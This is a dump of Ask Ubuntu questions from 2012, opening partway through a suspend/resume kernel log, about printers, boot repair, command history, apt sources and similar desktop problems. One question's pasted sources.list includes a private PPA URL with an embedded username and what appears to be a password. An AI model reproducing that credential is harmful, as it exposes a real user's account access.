resume of drv : dev : ep_00 complete after 223.255 msecs jun 1 10:42:21 igor-laptop kernel : [ 2225.820295 ] pm : resume of drv : hub dev:6-0:1.0 complete after 223.453 msecs jun 1 10:42:21 igor-laptop kernel : [ 2225.820302 ] pm : resume of drv : dev : ep_00 complete after 223.415 msecs jun 1 10:42:21 igor-laptop kernel : [ 2225.820321 ] pm : resume of drv : dev : ep_81 complete after 223.457 msecs jun 1 10:42:21 igor-laptop kernel : [ 2225.932108 ] usb 4-2 : reset full-speed usb device number 2 using uhci_hcd jun 1 10:42:21 igor-laptop kernel : [ 2226.086714 ] pm : resume of drv : usbhid dev:4-2:1.0 complete after 489.393 msecs jun 1 10:42:21 igor-laptop kernel : [ 2226.086728 ] pm : resume of drv : dev : ep_81 complete after 489.384 msecs jun 1 10:42:21 igor-laptop kernel : [ 2226.086745 ] pm : resume of drv : dev : ep_00 complete after 489.329 msecs jun 1 10:42:21 igor-laptop kernel : [ 2226.086753 ] pm : resume of drv : usbhid dev:4-2:1.1 complete after 489.384 msecs jun 1 10:42:21 igor-laptop kernel : [ 2226.086764 ] pm : resume of drv : dev : ep_82 complete after 489.373 msecs jun 1 10:42:21 igor-laptop kernel : [ 2226.180555 ] usb 7-2 : reset full-speed usb device number 2 using uhci_hcd jun 1 10:42:21 igor-laptop kernel : [ 2226.244858 ] firewire_core : rediscovered device fw0 jun 1 10:42:21 igor-laptop kernel : [ 2226.335066 ] btusb 7-2:1.0 : no reset_resume for driver btusb ? jun 1 10:42:21 igor-laptop kernel : [ 2226.335068 ] btusb 7-2:1.1 : no reset_resume for driver btusb ? jun 1 10:42:21 igor-laptop kernel : [ 2226.432082 ] usb 6-1 : reset full-speed usb device number 2 using uhci_hcd jun 1 10:42:21 igor-laptop kernel : [ 2226.578280 ] pm : resume of drv : nvidia dev:0000:01:00.0 complete after 985.301 msecs jun 1 10:42:21 igor-laptop kernel : [ 2226.584296 ] pm : resume of drv : usb dev:7-2:1.0 complete after 986.693 msecs jun 1 10:42:21 igor-laptop kernel : [ 2226.584308 ] pm : resume of drv : dev : ep_00 complete after 986.452 msecs jun 1 10:42:21 igor-laptop kernel : [ 2226.584311 ] pm : resume of drv : usb dev:7-2:1.1 complete after 986.616 msecs jun 1 10:42:21 igor-laptop kernel : [ 2226.584315 ] pm : resume of drv : usb dev:7-2:1.3 complete after 986.483 msecs jun 1 10:42:21 igor-laptop kernel : [ 2226.584320 ] pm : resume of drv : usb dev:7-2:1.2 complete after 986.556 msecs jun 1 10:42:21 igor-laptop kernel : [ 2226.584328 ] pm : resume of drv : dev : ep_03 complete after 986.588 msecs jun 1 10:42:21 igor-laptop kernel : [ 2226.584331 ] pm : resume of drv : dev : ep_81 complete after 986.704 msecs jun 1 10:42:21 igor-laptop kernel : [ 2226.584334 ] pm : resume of drv : dev : ep_83 complete after 986.617 msecs jun 1 10:42:21 igor-laptop kernel : [ 2226.584337 ] pm : resume of drv : dev : ep_82 complete after 986.688 msecs jun 1 10:42:21 igor-laptop kernel : [ 2226.584340 ] pm : resume of drv : dev : ep_02 complete after 986.667 msecs jun 1 10:42:21 igor-laptop kernel : [ 2226.584344 ] pm : resume of drv : dev : ep_84 complete after 986.558 msecs jun 1 10:42:21 igor-laptop kernel : [ 2226.584352 ] pm : resume of drv : dev : ep_04 complete after 986.542 msecs jun 1 10:42:21 igor-laptop kernel : [ 2226.590883 ] pm : resume of drv : dev : ep_00 complete after 993.327 msecs jun 1 10:42:21 igor-laptop kernel : [ 2226.590887 ] pm : resume of drv : usb dev:6-1:1.0 complete after 993.424 msecs jun 1 10:42:21 igor-laptop kernel : [ 2226.590927 ] pm : resume of drv : dev : ep_82 complete after 993.395 msecs jun 1 10:42:21 igor-laptop kernel : [ 2226.590934 ] pm : resume of drv : dev : ep_81 complete after 993.426 msecs jun 1 10:42:21 igor-laptop kernel : [ 2226.590940 ] pm : resume of drv : dev : ep_01 complete after 993.456 msecs jun 1 10:42:21 igor-laptop kernel : [ 2226.592450 ] pm : resume of drv : sd dev:0:0:0:0 complete after 995.343 msecs jun 1 10:42:21 igor-laptop kernel : [ 2226.592461 ] pm : resume of drv : scsi_disk dev:0:0:0:0 complete after 802.688 msecs jun 1 10:42:21 igor-laptop kernel : [ 2226.592472 ] pm : resume of drv : scsi_device dev:0:0:0:0 complete after 995.324 msecs jun 1 10:42:21 igor-laptop kernel : [ 2226.600339 ] pm : resume of devices complete after 1008.129 msecs jun 1 10:42:21 igor-laptop kernel : [ 2226.601293 ] pm : resume devices took 1.008 seconds jun 1 10:42:21 igor-laptop kernel : [ 2226.601330 ] pm : finishing wakeup . jun 1 10:42:21 igor-laptop kernel : [ 2226.601332 ] restarting tasks ... done . jun 1 10:42:21 igor-laptop kernel : [ 2226.625660 ] video lnxvideo:01 : restoring backlight state jun 1 10:42:22 igor-laptop kernel : [ 2227.478921 ] iwlwifi 0000:02:00.0 : l1 disabled ; enabling l0s jun 1 10:42:22 igor-laptop kernel : [ 2227.481981 ] iwlwifi 0000:02:00.0 : radio type=0x1-0x2-0x0 jun 1 10:42:22 igor-laptop kernel : [ 2227.527727 ] addrconf ( netdev_up ) : wlan0 : link is not ready jun 1 10:42:22 igor-laptop kernel : [ 2227.532468 ] r8169 0000:03:00.0 : eth0 : link down jun 1 10:42:22 igor-laptop kernel : [ 2227.533967 ] addrconf ( netdev_up ) : eth0 : link is not ready pm_suspend.log : fri jun 1 10:42:14 msk 2012 : running hooks for suspend . running hook /usr/lib/pm-utils/sleep.d/000kernel-change suspend suspend : /usr/lib/pm-utils/sleep.d/000kernel-change suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/00logging suspend suspend : linux igor-laptop 3.2.0-25-generic # 40-ubuntu smp wed may 23 20:33:05 utc 2012 i686 i686 i386 gnu/linux module size used by pci_stub 12550 1 vboxpci 22882 0 vboxnetadp 13328 0 vboxnetflt 27211 0 vboxdrv 252189 3 vboxpci , vboxnetadp , vboxnetflt dm_crypt 22528 0 snd_hda_codec_hdmi 31775 1 snd_hda_codec_idt 60251 1 arc4 12473 2 hp_wmi 13652 0 sparse_keymap 13658 1 hp_wmi rfcomm 38139 12 snd_hda_intel 32765 5 snd_hda_codec 109562 3 snd_hda_codec_hdmi , snd_hda_codec_idt , snd_hda_intel snd_hwdep 13276 1 snd_hda_codec bnep 17830 2 btusb 17912 2 bluetooth 158438 23 rfcomm , bnep , btusb joydev 17393 0 parport_pc 32114 0 snd_pcm 80845 4 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec ppdev 12849 0 uvcvideo 67203 0 binfmt_misc 17292 1 videodev 86588 1 uvcvideo snd_seq_midi 13132 0 snd_rawmidi 25424 1 snd_seq_midi nvidia 10958194 43 snd_seq_midi_event 14475 1 snd_seq_midi snd_seq 51567 2 snd_seq_midi , snd_seq_midi_event ir_lirc_codec 12739 0 lirc_dev 18700 1 ir_lirc_codec snd_timer 28931 2 snd_pcm , snd_seq snd_seq_device 14172 3 snd_seq_midi , snd_rawmidi , snd_seq ir_mce_kbd_decoder 12681 0 ir_sony_decoder 12462 0 ir_jvc_decoder 12459 0 ir_rc6_decoder 12459 0 psmouse 87213 0 ir_rc5_decoder 12459 0 serio_raw 13027 0 iwlwifi 287934 0 rc_rc6_mce 12454 0 ir_nec_decoder 12459 0 ene_ir 18019 0 rc_core 21263 10 ir_lirc_codec , ir_mce_kbd_decoder , ir_sony_decoder , ir_jvc_decoder , ir_rc6_decoder , ir_rc5_decoder , rc_rc6_mce , ir_nec_decoder , ene_ir mac80211 436455 1 iwlwifi snd 62064 19 snd_hda_codec_hdmi , snd_hda_codec_idt , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device cfg80211 178679 2 iwlwifi , mac80211 hp_accel 25728 0 lis3lv02d 19268 1 hp_accel input_polldev 13648 1 lis3lv02d mac_hid 13077 0 wmi 18744 1 hp_wmi jmb38x_ms 17406 0 soundcore 14635 1 snd snd_page_alloc 14115 2 snd_hda_intel , snd_pcm memstick 15857 1 jmb38x_ms firewire_sbp2 18346 0 lp 17455 0 parport 40930 3 parport_pc , ppdev , lp vesafb 13516 1 usbhid 41906 0 hid 77367 1 usbhid firewire_ohci 40180 0 firewire_core 56906 2 firewire_sbp2 , firewire_ohci crc_itu_t 12627 1 firewire_core sdhci_pci 18324 0 sdhci 28241 1 sdhci_pci r8169 56321 0 video 19068 0 total used free shared buffers cached mem : 3095544 2364260 731284 0 159020 1280240 -/+ buffers/cache : 925000 2170544 swap : 1718916 0 1718916 /usr/lib/pm-utils/sleep.d/00logging suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/00powersave suspend suspend : /usr/lib/pm-utils/sleep.d/00powersave suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/01pulseaudio suspend suspend : welcome to pulseaudio ! use `` help '' for usage information . > > > > > > welcome to pulseaudio ! use `` help '' for usage information . > > > > > > welcome to pulseaudio ! use `` help '' for usage information . > > > > > > /usr/lib/pm-utils/sleep.d/01pulseaudio suspend suspend : success . running hook /etc/pm/sleep.d/10_grub-common suspend suspend : /etc/pm/sleep.d/10_grub-common suspend suspend : success . running hook /etc/pm/sleep.d/10_unattended-upgrades-hibernate suspend suspend : /etc/pm/sleep.d/10_unattended-upgrades-hibernate suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/55networkmanager suspend suspend : having networkmanager put all interaces to sleep ... failed . /usr/lib/pm-utils/sleep.d/55networkmanager suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/60_wpa_supplicant suspend suspend : failed to connect to wpa_supplicant - wpa_ctrl_open : no such file or directory /usr/lib/pm-utils/sleep.d/60_wpa_supplicant suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/75modules suspend suspend : /usr/lib/pm-utils/sleep.d/75modules suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/90clock suspend suspend : /usr/lib/pm-utils/sleep.d/90clock suspend suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/94cpufreq suspend suspend : /usr/lib/pm-utils/sleep.d/94cpufreq suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/95anacron suspend suspend : stop : unknown instance : /usr/lib/pm-utils/sleep.d/95anacron suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/95hdparm-apm suspend suspend : /usr/lib/pm-utils/sleep.d/95hdparm-apm suspend suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/95led suspend suspend : /usr/lib/pm-utils/sleep.d/95led suspend suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/98video-quirk-db-handler suspend suspend : nvidia binary video drive detected , not using quirks . /usr/lib/pm-utils/sleep.d/98video-quirk-db-handler suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/99video suspend suspend : kernel.acpi_video_flags = 0 /usr/lib/pm-utils/sleep.d/99video suspend suspend : success . running hook /etc/pm/sleep.d/novatel_3g_suspend suspend suspend : /etc/pm/sleep.d/novatel_3g_suspend suspend suspend : success . fri jun 1 10:42:19 msk 2012 : performing suspend fri jun 1 10:42:21 msk 2012 : awake . fri jun 1 10:42:21 msk 2012 : running hooks for resume running hook /etc/pm/sleep.d/novatel_3g_suspend resume suspend : /etc/pm/sleep.d/novatel_3g_suspend resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/99video resume suspend : /usr/lib/pm-utils/sleep.d/99video resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/98video-quirk-db-handler resume suspend : /usr/lib/pm-utils/sleep.d/98video-quirk-db-handler resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/95led resume suspend : /usr/lib/pm-utils/sleep.d/95led resume suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/95hdparm-apm resume suspend : /dev/sda : setting advanced power management level to 0xfe ( 254 ) apm_level = 254 /dev/sda : setting advanced power management level to 0xfe ( 254 ) apm_level = 254 /usr/lib/pm-utils/sleep.d/95hdparm-apm resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/95anacron resume suspend : /usr/lib/pm-utils/sleep.d/95anacron resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/94cpufreq resume suspend : /usr/lib/pm-utils/sleep.d/94cpufreq resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/90clock resume suspend : /usr/lib/pm-utils/sleep.d/90clock resume suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/75modules resume suspend : reloaded unloaded modules . /usr/lib/pm-utils/sleep.d/75modules resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/60_wpa_supplicant resume suspend : failed to connect to wpa_supplicant - wpa_ctrl_open : no such file or directory /usr/lib/pm-utils/sleep.d/60_wpa_supplicant resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/55networkmanager resume suspend : having networkmanager wake interfaces back up ... failed . /usr/lib/pm-utils/sleep.d/55networkmanager resume suspend : success . running hook /etc/pm/sleep.d/10_unattended-upgrades-hibernate resume suspend : /etc/pm/sleep.d/10_unattended-upgrades-hibernate resume suspend : success . running hook /etc/pm/sleep.d/10_grub-common resume suspend : /etc/pm/sleep.d/10_grub-common resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/01pulseaudio resume suspend : welcome to pulseaudio ! use `` help '' for usage information . > > > > > > welcome to pulseaudio ! use `` help '' for usage information . > > > > > > welcome to pulseaudio ! use `` help '' for usage information . > > > > > > /usr/lib/pm-utils/sleep.d/01pulseaudio resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/00powersave resume suspend : /usr/lib/pm-utils/sleep.d/00powersave resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/00logging resume suspend : /usr/lib/pm-utils/sleep.d/00logging resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/000kernel-change resume suspend : /usr/lib/pm-utils/sleep.d/000kernel-change resume suspend : success . fri jun 1 10:42:22 msk 2012 : finished .
144933	canon lbp5050 doesnt print in 12.04	i 've installedand configured my printer many times with this guide : https : //help.ubuntu.com/community/canoncaptdrv190 i 've tried 2.4 and 2.3 drivers but noticed no difference . at first installed by using guide to 12.04 as i have that version on ubuntu . then tried the longer version . and mixed them up and googled a lot . now i 'm in situation that captstatusui does n't show anything at all . gui launches but all fields are empty . when i try to print a test page it tries to process a while and gives me this error message : ccp send_data error , exit
144938	how can i uniqely record every new command i use , and possibly timestamp it ?	i 've been on linux for more than 6 months now but never went too much into the cli ( command-line interface or terminal or shell ) now as i ask questions here , get answers , or help from other sites , i learn new commands ... how can i can store every new command in a text file ? only new/*unique* commands , not repetitions of the same command . here 's an example : in the terminal , i enter the commands like this- ubuntu @ ubuntu : ~ $ command1 ubuntu @ ubuntu : ~ $ command2 ubuntu @ ubuntu : ~ $ command3 ubuntu @ ubuntu : ~ $ command4 ubuntu @ ubuntu : ~ $ command1 now , these commands should get saved in a text file say commandrec like this- command1 command2 command3 command4 note : the last command in the terminal which was again command1 is not recorded/saved again in the text file . and the next time i open the terminal , and enter a new command command 5 , it should get appended to the list in commandrec ( but if the command was used earlier on some other date , it should still be ignored . for example , command 1 entered again along with command 5 on a new day/time but command1 not recorded as already used ) the commandrec file looking something like this- 31/05/12 12:00:00 command1 command2 command3 command4 01/06/12 13:00:00 command 5 ( the time and date thing would be great if possible , but okay even if that is n't there ) this way , i can have a record of all commands used by me to date . how can this be done ?
144950	`` who '' command - how to show ip address	i would like to know if there is an option to get the ip address of loged users with who command ? when i type who i get this : wolfy @ wolfy-server : ~ $ who wolfy pts/0 2012-06-01 09:43 ( tzu-23-764-657.sta.als.some.net ) i would like to replace `` tzu-23-764-657.sta.als.some.net '' with a real ip address , like in `` last '' command : wolfy @ wolfy-server : ~ $ last -i wolfy pts/0 123.123.123.123 fri jun 1 09:43 still logged in i did not find any options to do that ... do you know a way to do this ... maybe a different command ?
144952	launcher vanished after disabling unity plugin	i unfortunately disabled the unity plugin from compizconfig , now the launcher is vanished . i can not re-enable the unity plugin now , because no way for me to load compizconfig again without the launcher . please suggest any way to overcome this problem . i am using ubuntu 12.04 lts .
144954	recover `` ps '' command	so i found myself in a situation where i needed to copy the ps command though i suppose that i use mv instead of cp . i copied the binary to the incorrect location and immediately deleted it . looking back to the source in bin\ , i could n't find the binary anywhere . i attempted to reinstall the coreutils package in ubuntu but ps has n't come back to me ; is there another package where ps comes from ?
144959	delete files from trash after x days	is there any way to configure ubuntu to permanently delete files from trash after a certain amount of time ? i do n't get why that 's not the default behavior in any major os . i do n't want to think about administrating my trash , but i do n't want to accidentally delete something either . am i the only one with that opinion ?
144961	windows does n't boot after ubuntu installation	i have had serious problems installing ubuntu and windows and have dual boot . recently i installed both operating systems , ubuntu was the last one , and after that my computer was booting directly to windows 7 . i used my ubuntu usb live to repair the grub , and could repair . now i initiate my pc with grub 1.99 and ubuntu and windows are recognized , but windows gives an error and do n't initiate , suggesting to use windows dvd to repair the grub . i tried that but with no effects on be behavior . i have a new asus n56vm . this conflicts with gpt and mbr have been a huge pain to me . i do n't know what to to , i installed ubuntu and windows numerous times since i bought this computer 2 weeks ago .
144964	software index broken	when i was installing mts mblaz crossplatformui.deb for mts data connect , its installed partial and shows error , and so i tried to uninstall `` crossplatformui '' but every time it showed following error . installarchives ( ) failed : perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 205769 files and directories currently installed . ) removing crossplatformui ... ztemtvcdromd : no process found dpkg : error processing crossplatformui ( -- remove ) : subprocess installed post-removal script returned error exit status 1 no apport report written because maxreports is reached already errors were encountered while processing : crossplatformui setting up firmware-b43-installer ( 4.150.10.5-5 ) ... -- 2012-06-01 14:11:21 -- http : //mirror2.openwrt.org/sources/broadcom-wl-4.150.10.5.tar.bz2 resolving mirror2.openwrt.org ... 46.4.11.11 connecting to mirror2.openwrt.org|46.4.11.11|:80 ... failed : connection refused . dpkg : error processing firmware-b43-installer ( -- configure ) : subprocess installed post-installation script returned error exit status 4
144968	set variable in .desktop file	is there a way to set the enviroment variable in .desktop file ? i 'm trying to run application ( eclipse ) with custom gtk style , so basically i want to get the following result by runing a .desktop file : gtk2_rc_files=gtkrc.custom /path/to/eclipse i 've tryied to put it in a bash script and run it from the .desktop file , but then it does not integrate well with the unity launcher .
144969	terminal command autocomplete	i 'm currently trying to switch from opensuse to ubuntu as my main os . while most of opensuse features is there in ubuntu , there is one feature that does n't . in opensuse , i can always use ctrl+up to autocomplete the command line using previously typed command . that feature is very useful for me as it allows me to work faster without having to retype long command . can anyone provide a way to enable this on ubuntu ? thank you
144975	problems with update manager	whenever i try to update with update manager i get the following errors : w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise/release unable to find expected entry 'commercial/source/sources ' in release file ( wrong sources.list entry or malformed file ) w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise-updates/release unable to find expected entry 'commercial/source/sources ' in release file ( wrong sources.list entry or malformed file ) w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise-backports/release unable to find expected entry 'commercial/source/sources ' in release file ( wrong sources.list entry or malformed file ) w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise-security/release unable to find expected entry 'commercial/source/sources ' in release file ( wrong sources.list entry or malformed file ) w : failed to fetch http : //ppa.launchpad.net/iefremov/ppa/ubuntu/dists/precise/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/iefremov/ppa/ubuntu/dists/precise/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/iefremov/ppa/ubuntu/dists/precise/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . any help would be much appreciated , thank you . thank you very much eliah . i 'm still pretty new to ubuntu . here 's the output i got from the terminal : no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04 lts release : 12.04 codename : precise # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //archive.ubuntu.com/ubuntu precise main restricted commercial deb-src http : //archive.ubuntu.com/ubuntu precise restricted main commercial multiverse universe # added by software-properties # # major bug fix updates produced after the final release of the # # distribution . deb http : //archive.ubuntu.com/ubuntu precise-updates main restricted commercial deb-src http : //archive.ubuntu.com/ubuntu precise-updates restricted main commercial multiverse universe # added by software-properties # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu precise universe deb http : //archive.ubuntu.com/ubuntu precise-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //archive.ubuntu.com/ubuntu precise multiverse deb http : //archive.ubuntu.com/ubuntu precise-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu precise-backports main restricted universe multiverse commercial deb-src http : //archive.ubuntu.com/ubuntu precise-backports main restricted universe multiverse commercial # added by software-properties deb http : //archive.ubuntu.com/ubuntu precise-security main restricted commercial deb-src http : //archive.ubuntu.com/ubuntu precise-security restricted main commercial multiverse universe # added by software-properties deb http : //archive.ubuntu.com/ubuntu precise-security universe deb http : //archive.ubuntu.com/ubuntu precise-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu oneiric partner deb-src http : //archive.canonical.com/ubuntu precise partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu precise main deb-src http : //extras.ubuntu.com/ubuntu precise main # # this is a 3rd party script to install and update oracle java deb http : //www.duinsoft.nl/pkg debs all # # sun-java6-jre deb http : //security.ubuntu.com/ubuntu hardy-security main multiverse ** /etc/apt/sources.list.d/askubuntu-tools-ppa-precise.list : deb http : //ppa.launchpad.net/askubuntu-tools/ppa/ubuntu precise main deb-src http : //ppa.launchpad.net/askubuntu-tools/ppa/ubuntu precise main ** /etc/apt/sources.list.d/askubuntu-tools-ppa-precise.list.save : deb http : //ppa.launchpad.net/askubuntu-tools/ppa/ubuntu precise main deb-src http : //ppa.launchpad.net/askubuntu-tools/ppa/ubuntu precise main ** /etc/apt/sources.list.d/effie-jayx-turpial-oneiric.list : deb http : //ppa.launchpad.net/effie-jayx/turpial/ubuntu precise main # disabled on upgrade to precise deb-src http : //ppa.launchpad.net/effie-jayx/turpial/ubuntu precise main # disabled on upgrade to precise ** /etc/apt/sources.list.d/effie-jayx-turpial-oneiric.list.distupgrade : deb http : //ppa.launchpad.net/effie-jayx/turpial/ubuntu oneiric main deb-src http : //ppa.launchpad.net/effie-jayx/turpial/ubuntu oneiric main ** /etc/apt/sources.list.d/effie-jayx-turpial-oneiric.list.save : deb http : //ppa.launchpad.net/effie-jayx/turpial/ubuntu precise main # disabled on upgrade to precise deb-src http : //ppa.launchpad.net/effie-jayx/turpial/ubuntu precise main # disabled on upgrade to precise ** /etc/apt/sources.list.d/getdeb.list : # deb http : //archive.getdeb.net/ubuntu oneiric-getdeb apps # disabled on upgrade to precise ** /etc/apt/sources.list.d/getdeb.list.distupgrade : deb http : //archive.getdeb.net/ubuntu oneiric-getdeb apps ** /etc/apt/sources.list.d/getdeb.list.save : # deb http : //archive.getdeb.net/ubuntu oneiric-getdeb apps # disabled on upgrade to precise ** /etc/apt/sources.list.d/hotot-team-ppa-oneiric.list : deb http : //ppa.launchpad.net/hotot-team/ppa/ubuntu precise main # disabled on upgrade to precise deb-src http : //ppa.launchpad.net/hotot-team/ppa/ubuntu precise main # disabled on upgrade to precise ** /etc/apt/sources.list.d/hotot-team-ppa-oneiric.list.distupgrade : deb http : //ppa.launchpad.net/hotot-team/ppa/ubuntu oneiric main deb-src http : //ppa.launchpad.net/hotot-team/ppa/ubuntu oneiric main ** /etc/apt/sources.list.d/hotot-team-ppa-oneiric.list.save : deb http : //ppa.launchpad.net/hotot-team/ppa/ubuntu precise main # disabled on upgrade to precise deb-src http : //ppa.launchpad.net/hotot-team/ppa/ubuntu precise main # disabled on upgrade to precise ** /etc/apt/sources.list.d/iefremov-ppa-precise.list : deb http : //ppa.launchpad.net/iefremov/ppa/ubuntu precise main deb-src http : //ppa.launchpad.net/iefremov/ppa/ubuntu precise main ** /etc/apt/sources.list.d/iefremov-ppa-precise.list.save : deb http : //ppa.launchpad.net/iefremov/ppa/ubuntu precise main deb-src http : //ppa.launchpad.net/iefremov/ppa/ubuntu precise main ** /etc/apt/sources.list.d/jockey.list : deb http : //www.openprinting.org/download/printdriver/debian/ lsb3.2 main-nonfree # disabled on upgrade to precise ** /etc/apt/sources.list.d/jockey.list.distupgrade : deb http : //www.openprinting.org/download/printdriver/debian/ lsb3.2 main-nonfree ** /etc/apt/sources.list.d/jockey.list.save : deb http : //www.openprinting.org/download/printdriver/debian/ lsb3.2 main-nonfree # disabled on upgrade to precise ** /etc/apt/sources.list.d/plexydesk-plexydesk-dailybuild-precise.list : deb http : //ppa.launchpad.net/plexydesk/plexydesk-dailybuild/ubuntu precise main deb-src http : //ppa.launchpad.net/plexydesk/plexydesk-dailybuild/ubuntu precise main ** /etc/apt/sources.list.d/plexydesk-plexydesk-dailybuild-precise.list.save : deb http : //ppa.launchpad.net/plexydesk/plexydesk-dailybuild/ubuntu precise main deb-src http : //ppa.launchpad.net/plexydesk/plexydesk-dailybuild/ubuntu precise main ** /etc/apt/sources.list.d/precise-partner.list : deb http : //archive.canonical.com/ubuntu precise partner # added by software-center ** /etc/apt/sources.list.d/precise-partner.list.save : deb http : //archive.canonical.com/ubuntu precise partner # added by software-center ** /etc/apt/sources.list.d/private-ppa.launchpad.net_commercial-ppa-uploaders_crossover-pro_ubuntu.list : # deb https : //justin-dormandy : fbqjglt5x6phfttxzlfp @ private-ppa.launchpad.net/commercial-ppa-uploaders/crossover-pro/ubuntu precise main # added by software-center disabled on upgrade to precise ** /etc/apt/sources.list.d/private-ppa.launchpad.net_commercial-ppa-uploaders_crossover-pro_ubuntu.list.distupgrade : cat : /etc/apt/sources.list.d/private-ppa.launchpad.net_commercial-ppa-uploaders_crossover-pro_ubuntu.list.distupgrade : permission denied ** /etc/apt/sources.list.d/private-ppa.launchpad.net_commercial-ppa-uploaders_crossover-pro_ubuntu.list.save : cat : /etc/apt/sources.list.d/private-ppa.launchpad.net_commercial-ppa-uploaders_crossover-pro_ubuntu.list.save : permission denied ** /etc/apt/sources.list.d/screenlets-ppa-precise.list : deb http : //ppa.launchpad.net/screenlets/ppa/ubuntu precise main deb-src http : //ppa.launchpad.net/screenlets/ppa/ubuntu precise main ** /etc/apt/sources.list.d/screenlets-ppa-precise.list.save : deb http : //ppa.launchpad.net/screenlets/ppa/ubuntu precise main deb-src http : //ppa.launchpad.net/screenlets/ppa/ubuntu precise main ** /etc/apt/sources.list.d/webupd8team-java-precise.list : deb http : //ppa.launchpad.net/webupd8team/java/ubuntu precise main deb-src http : //ppa.launchpad.net/webupd8team/java/ubuntu precise main ** /etc/apt/sources.list.d/webupd8team-java-precise.list.save : deb http : //ppa.launchpad.net/webupd8team/java/ubuntu precise main deb-src http : //ppa.launchpad.net/webupd8team/java/ubuntu precise main
144977	equivalent of `` gnome window selector '' for unity ( 2d ) panel ?	on ubuntu 12.04 with unity 2d , is it possible to get a menu on the panel at the top of the screen that would allow me to quickly navigate to a particular window ( no matter which workspace it happens to be on ) ? on gnome 2 this used to be available with the gnome window selector applet . thanks ! ~l
144978	installing windows 8 over 12.04 , but getting `` error : unknown filesystem ''	i have had bad experiences with 12.04 on my laptop , too many things just dont work so am wiping it and replacing with windows 8 release preview to get it running again . anyway , i installed normally , deleted partitions and formatted and installed windows fine , but now there is an error coming up when it boots : error : unknown filesystem grub rescue > ive tried repairing from windows 8 disk , doing fixmbr and fixboot but hasnt worked , neither has reinstalling . any ideas how to get rid of this ?
144983	why does n't clicking on notification buttons in xubuntu 12.04 dismiss the notification ?	when i try to reconnect my bluetooth mouse in xubuntu 12.04 , i realized that all the notification windows do not allow me to press any buttons . i can click the buttons but nothing happens . i can close the notification with the `` x '' but clicking options like allow or deny does nothing . after some googling i found that i 'm not the only one with this problem but i ca n't find any fix .
